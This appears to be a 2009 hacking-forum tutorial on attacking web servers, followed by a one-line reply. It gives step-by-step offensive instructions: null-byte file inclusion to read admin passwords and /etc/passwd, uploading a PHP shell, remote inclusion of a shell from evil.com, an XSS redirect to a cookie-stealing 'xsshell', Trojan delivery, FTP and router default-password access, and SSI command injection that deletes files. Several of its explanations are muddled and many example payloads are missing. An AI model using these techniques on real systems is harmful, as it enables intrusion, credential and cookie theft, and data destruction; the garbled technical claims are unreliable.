Posts : 63
Join date : 2009-05-10
Age : 25
|Subject: Server Flaws (RFI,LFI,XSS,CSS) Sat Jun 13, 2009 1:59 pm|| |
Hello, many people go around the net nowadays making up these facts that they are great hackers and they have a "Cracker/Hacker" tool. That is just fantasy getting made up to scare you and give you interest, they think it will make you bribe them anything.
Don't trust that, even if its your best friend.
Today I will be showing you many, many, flaws on an internal server, we will go through PHP Attacks, Java attacks, and URL manipulation.
Lets start with URL manipulation, shall we?
Well, lets say you find a login for a certain website.
Go ahead and view the source.
If you see anything familiar to:
Then that is the PHP file representing login.php, here is an example of how the URL may look like:
Once we go there it will probably forbid access because we did not enter anything and we do not have any SESSION id given by the server.
But don't you see anything suspicious on the page that is functioning (index.php?file=login.php) Well, if you see anything cached on that page such as: password.php, your in luck. Go to that exact PHP file. You can do this via: http://www.target.com/admin/index.php?file=password.php
And you might get back the Administrator Username and Password, and it has no encryption in any format whatsoever (MD5, SHA1, etc)
But the Administrators can go further to protect them selves, but there are more manipulations. Lets continue on to them?
Null Byte Includes
Now, on our last URL manipulation, we got access to the admin site, and while reviewing the source we found:
Which featured us the password.php motive which told us that if we replaced login.php with password.php it will feature the administrative USR and PWD without any encryption (md5, sha1, etc).
But, what if the administrators have knowledge and are smarter, but what they think is that LFI, is LFI, and if its original form doesn't work, it would never work. But that is totally wrong. You can use Null Byte includes to gain knowledge in the PHP/CGI source that is representing that file.
So basically lets say that password.php was forbidden for outside users, here is a sample of that content:
It featured content showing the password without any encryption.
But once you go to it, your forbidden, but this can be changed by adding a Null Byte include. Here is how it would look:
That poisoned null byte gives us the ability to view the source of that .PHP file thus giving us the password for the administrative user account.
This can be used for other destruction such as viewing config.php, /etc/passwd, etc.
Null Byte Upload
Lets say you make an attempt to upload a shell on some website, but it replies back with an error claiming it only accepts JPG, PNG, etc.
Well most of you would say "Ugh ill just give up"
And others would say "I will just rename my shell to ShellName.php.jpg"
Both are wrong.
You can simply bypass this using a poison null byte upload.
How do you do this destructive attack? Its really simple, follow this steps to determine your question:
1. Open Notepad
2. Copy and Paste your PHP Shell
3. File >> Save as >> shellname%00.php.jpg
4. Upload to the server
Our null byte (%00) adds a URL-Encoded format into .jpg thus giving back our file (in most cases your shell).
LFI Represents Local File Inclusion, it is basically a URL transverse, here is an example of an LFI code:
And here is an example of a vulnerable code:
$page = $_GET[page];
That PHP script should never be used, because $page is passed directly on the webpage.
And the LFI code represents what can happen if your $page is written like that.
the ../'s you see are called URL transversal, they let you serve anywhere around the server using characters that represent UP, Down, etc.
Lets move on to the LFI script itself and play around with it for a bit.
What that does is goes up to the directory /etc/passwd.
/etc/passwd is a representation for a Linux box featuring its encrypted password, just like Windows has its own encrypted passwd function (SAM) Unix has it as well.
Once they gain access to that directory, they have the ability to view users, and crack the encoded password via Brute-Force.
But sometimes Administrators can be smart, and this is where the poisoned null byte comes in hand, if you cannot access /etc/passwd, it eventually means that the Administrator progressed something into it.
So you can try:
You can use a poison null byte due to the fact that sometimes Admins try to add something like .php.txt etc to make it harder for you to gain access to the file.
Fortunately you can easily bypass this using the poison null-byte.
RFI is most commonly used to transmit a shell to a web server but its actually not uploaded, it is just an appearance on the web server itself.
RFI can be used for plenty of things, transmitting password loggers, etc. But its commonly used for its brilliant ability to store a shell.
Now if your not familiar with what a shell is, a shell is a PHP script that is used to cd to directories, view dirs, gain access to mysql, and find private files the server has stored on there web server.
How can this be a bad thing for you? They can leak an entire db leak using there access in MySQL, this db can feature usernames, passwords, emails, etc.
They can gain access to ANYTHING. Here is an example of an RFI attempt:
That tells the web server to go to the page of http://www.evil.com/shell.txt
and how will it work you may be asking yourself, well it will work because the .txt file is filled with PHP commands/tags that point at the PHP extension.
We need to add the ? due to the fact that its basically like a URL transversal thing but its really not it just points at that directory (http://www.evil.com/shell.txt).
XSS is used a lot on search engines, it can also be used to point at an xsshell.
That makes an alert textbox featuring our keyword "Test".
So press enter, and if it comes back with what we presented in our script, then your site is vulnerable to XSS.
If you get the (sup) back, it is also vulnerable to HTML injection.
<meta http-equiv="refresh" content="0;url=http://www.yourxsshell.com/attack.php" />
That uses meta to redirect to your xsshell.
Here is an example of how that may look after its encoded (this uses google.com as an example)
There you go, it is encoded.
What you want to is redirect it to your XSSHell, so you might need to modify my example.
Download xsshell (includes info etc)
Now once you send that XSS'd link to somebody which includes your xsshell you will log all of their cookies, ses id's, etc.
You can even put a Trojan download instead of an XSShell, but you have to make it look well-thought out.
FTP is the File Transfer Protocol on a web server, it is used to store files, view files, etc.
But there is a root account that contains all the permission, we don't have root and it would probably take forever to do a Brute-Force on the account.
So a trick is to do the following:
1. Open Command Prompt
2. Type in: ftp http://www.target.com
3. Enter WRONG details.
4. Then once your done with that type in: quote user ftp
then type in quote cwd ~root
then type in quote pass ftp
That quotes the user account FTP
Then it quotes the cwd of ~root
Don't expect this to work on every website, some websites have anonymous login disabled meaning this won't work as much as you expected it to .
Robots.txt is a text file that is used to control spiders that visit your website. This file grants access to certain folders, file types, and specific files depending on the robot accessing the site.
Here is an example of robots.txt:
Also, theUser-agent: *
This can be used as a URL transversal method.
Here is an example of how it may look like:
Well, after you get a 404 ERROR page, you should see something like /../
You may notice that from our LFI explanation, /../ is used to transmit to other directories, well in this case giving us access to the disallowed directories that are formed in robots.txt. For example
But do NOT expect this to work on every single website that has robots.txt
A method of transmitting PPP traffic over Ethernet to the Internet through a common broadband medium.
But sometimes even hosts do not have PPP tunneled (if they have it on there network).
PPP can used in telnet, so that is what we will we be focusing on.
First, you want to do an nmap scan via:
nmap -v -A host.com
And you will need to wait until it is finished, we will need to see what OS this runs under, this will give us loads of information such as possible router info.
So after its done you might want to go to google and search:
Router-Name Default Password
Because in telnet, the PPPoE password is usually defaulted.
So for example, if it prompts you for the user and password, you can try:
Now, once your in. You can cd to directories and view dirs, the /var section includes ability to view messages, logs, etc.
You may want to focus on finding config.xml, because that included CWMP, ACS, and possible POP information.
If however you cannot get PPPoE access, you can run a Brute-Force attack, or you can try accessing certain directories such as cwmp.host.com, usually the sites are put under https because they think its a high-level of encryption so its harder to crack, but the password for that can be easily prompted by using useragent vulnerables, cookie spoofing, and also FTP vulnerabilities which were discussed in our previous tutorial on Web Hacking.
The FTP Vulnerabilities we discussed will get you on a very high level because it may include db's, configs, etc.
Serverside Includes (Evil SSI)
The most common way to to find one of these vulnerabilities are to simply use a search box. Serverside Includes are basically abilities to view directories.. Just so I can explain it in a more efficient way, lets say your in the directory /admin, and you have a search field, and your wondering what else is in the /admin directory, well you can simply use this :
ls is a command used to display directories, and cmd is basically a Command Prompt.
After we get a reply displayed along with directories, we can use rm to remove directories, example:
<!--#exec cmd="rm file.php"-->
We can do a lot of things, but these are just set examples.
Posts : 6
Join date : 2009-12-26
|Subject: Re: Server Flaws (RFI,LFI,XSS,CSS) Sat Dec 26, 2009 1:53 pm|| |
What do u mean by lot of things